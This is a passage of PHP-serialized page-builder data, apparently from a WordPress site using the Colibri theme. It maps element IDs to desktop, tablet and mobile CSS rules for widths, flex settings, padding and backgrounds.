.h-navigation_sticky.style-local-25-h4-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n}\n\";}s:11:\"local-25-h6\";a:1:{s:7:\"desktop\";s:92:\"#colibri .style-local-25-h6-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n max-width: 100%;\n}\n\";}s:11:\"local-25-h8\";a:1:{s:7:\"desktop\";s:299:\"#colibri .style-local-25-h8-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-25-h8-outer,#colibri .h-navigation_sticky.style-local-25-h8-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n\";}s:12:\"local-25-h14\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-25-h14-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-25-h17\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-25-h17-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-25-h26\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-25-h26-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-25-h26-outer {\n width: 100% ;\n}\n\";}}i:28;a:1:{s:11:\"local-28-f4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-28-f4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:31;a:10:{s:11:\"local-31-m4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-31-m4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"dynamic-31-m5\";a:1:{s:7:\"desktop\";s:59:\".site .style-dynamic-31-m5-height {\n min-height: 300px;\n}\n\";}s:11:\"local-31-m7\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m7-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m11\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m13\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m18\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m21\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m21-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m23\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m23-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m31\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-31-m31-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:34;a:8:{s:11:\"local-34-m4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-34-m4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"dynamic-34-m5\";a:1:{s:7:\"desktop\";s:59:\".site .style-dynamic-34-m5-height {\n min-height: 300px;\n}\n\";}s:11:\"local-34-m7\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m7-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m13\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m13-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m15\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m15-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m19\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-34-m21\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-34-m23\";a:1:{s:7:\"desktop\";s:0:\"\";}}i:37;a:1:{s:11:\"local-37-m3\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-37-m3-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:40;a:7:{s:11:\"local-40-m3\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-40-m3-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:11:\"local-40-m5\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-40-m5-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-40-m13\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m14\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m18\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m21\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-40-m21-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:43;a:1:{s:11:\"local-43-s4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-43-s4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:46;a:1:{s:11:\"local-46-s4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-46-s4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:20;a:6:{s:12:\"local-20-c10\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-20-c10-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-20-c14\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-20-c14-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-20-c18\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-20-c18-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:11:\"local-20-c7\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-20-c7-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:54:\"#colibri .style-local-20-c7-outer {\n width: 100% ;\n}\n\";}s:11:\"local-20-c4\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-20-c4-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:54:\"#colibri .style-local-20-c4-outer {\n width: 100% ;\n}\n\";}s:11:\"local-20-c5\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-20-c5-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:54:\"#colibri .style-local-20-c5-outer {\n width: 100% ;\n}\n\";}}i:122;a:4:{s:12:\"local-122-c4\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-122-c4-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-122-c4-outer {\n width: 100% ;\n}\n\";}s:12:\"local-122-c8\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-122-c8-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:54:\"#colibri .style-local-122-c8-outer {\n width: 90% ;\n}\n\";}s:13:\"local-122-c18\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-122-c18-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-122-c18-outer {\n width: 90% ;\n}\n\";}s:13:\"local-122-c19\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-122-c19-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-122-c19-outer {\n width: 100% ;\n}\n\";}}i:126;a:12:{s:13:\"local-126-c10\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c10-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c10-outer {\n width: 90% ;\n}\n\";}s:13:\"local-126-c11\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c11-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c11-outer {\n width: 100% ;\n}\n\";}s:13:\"local-126-c16\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c16-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c16-outer {\n width: 100% ;\n}\n\";}s:13:\"local-126-c19\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c19-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c19-outer {\n width: 90% ;\n}\n\";}s:13:\"local-126-c28\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c28-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c28-outer {\n width: 100% ;\n}\n\";}s:13:\"local-126-c31\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c31-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c31-outer {\n width: 90% ;\n}\n\";}s:13:\"local-126-c34\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c34-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c34-outer {\n width: 90% ;\n}\n\";}s:13:\"local-126-c35\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c35-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c35-outer {\n width: 100% ;\n}\n\";}s:13:\"local-126-c40\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c40-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c40-outer {\n width: 90% ;\n}\n\";}s:13:\"local-126-c41\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c41-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c41-outer {\n width: 100% ;\n}\n\";}s:13:\"local-126-c47\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c47-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-126-c47-outer {\n width: 100% ;\n}\n\";}s:13:\"local-126-c51\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-126-c51-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-126-c51-outer {\n width: 90% ;\n}\n\";}}i:449;a:1:{s:12:\"local-449-c4\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-449-c4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:185;a:2:{s:12:\"local-185-c4\";a:2:{s:7:\"desktop\";s:97:\"#colibri .style-local-185-c4-outer {\n width: 33.33% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-185-c4-outer {\n width: 100% ;\n}\n\";}s:12:\"local-185-c7\";a:2:{s:7:\"desktop\";s:97:\"#colibri .style-local-185-c7-outer {\n width: 33.33% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-185-c7-outer {\n width: 100% ;\n}\n\";}}i:182;a:82:{s:14:\"local-182-c151\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c151-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c152\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c157\";a:2:{s:7:\"desktop\";s:96:\"#colibri .style-local-182-c157-outer {\n width: 80% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:57:\"#colibri .style-local-182-c157-outer {\n width: 100% ;\n}\n\";}s:13:\"local-182-c75\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c75-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c81\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c81-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c87\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c87-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c93\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c93-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c99\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c99-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c105\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c105-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c110\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c110-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c116\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c116-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c122\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c122-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c128\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c128-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c134\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c134-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c140\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c140-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c228\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c228-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c234\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c234-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c82\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c76\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c94\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c100\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c106\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c111\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c117\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c123\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c129\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c135\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c141\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c229\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c235\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c88\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c147\";a:2:{s:7:\"desktop\";s:96:\"#colibri .style-local-182-c147-outer {\n width: 80% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:57:\"#colibri .style-local-182-c147-outer {\n width: 100% ;\n}\n\";}s:14:\"local-182-c161\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c161-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c166\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c166-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c171\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c171-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c176\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c176-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c181\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c181-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c186\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c186-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c191\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c191-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c196\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c196-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c200\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c200-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c205\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c205-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c210\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c210-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c215\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c215-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c220\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:97:\"#colibri .style-local-182-c220-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:14:\"local-182-c162\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c182\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c187\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c192\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c197\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c201\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c206\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c211\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c216\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c221\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c167\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c172\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c177\";a:1:{s:7:\"desktop\";s:0:\"\";}s:14:\"local-182-c226\";a:2:{s:7:\"desktop\";s:96:\"#colibri .style-local-182-c226-outer {\n width: 80% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:57:\"#colibri .style-local-182-c226-outer {\n width: 100% ;\n}\n\";}s:12:\"local-182-c4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-182-c4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c10\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c10-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c16\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c16-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c22\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c22-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c28\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c28-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c34\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c34-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c40\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c40-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c46\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c46-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c52\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c52-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c58\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c58-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-182-c64\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-182-c64-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-182-c5\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c29\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c35\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c41\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c47\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c53\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c59\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c65\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c11\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c17\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c23\";a:1:{s:7:\"desktop\";s:0:\"\";}s:13:\"local-182-c71\";a:2:{s:7:\"desktop\";s:95:\"#colibri .style-local-182-c71-outer {\n width: 80% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:56:\"#colibri .style-local-182-c71-outer {\n width: 100% ;\n}\n\";}}i:608;a:1:{s:12:\"local-608-c4\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-608-c4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:453;a:5:{s:13:\"local-453-c13\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-453-c13-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-453-c16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-453-c4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-453-c4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-453-c6\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-453-c6-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-453-c8\";a:3:{s:7:\"desktop\";s:97:\"#colibri .style-local-453-c8-outer {\n width: 80.60% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-453-c8-outer {\n width: 70% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-453-c8-outer {\n width: 100% ;\n}\n\";}}i:1573;a:1:{s:13:\"local-1573-c4\";a:1:{s:7:\"desktop\";s:96:\"#colibri .style-local-1573-c4-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}}s:7:\"cssById\";a:605:{i:1;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:2;a:3:{s:7:\"desktop\";s:428:\"#colibri .style-2 {\n animation-duration: 0.5s;\n padding-top: 20px;\n padding-right: 15px;\n padding-bottom: 20px;\n padding-left: 15px;\n background-color: transparent;\n background-image: none;\n}\n#colibri .h-navigation_sticky .style-2,#colibri .h-navigation_sticky.style-2 {\n background-color: #ffffff;\n background-image: none;\n padding-top: 10px;\n padding-bottom: 10px;\n box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:189:\"#colibri .style-2 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-2,#colibri .h-navigation_sticky.style-2 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";}i:3;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:4;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-4 {\n text-align: center;\n height: auto;\n min-height: 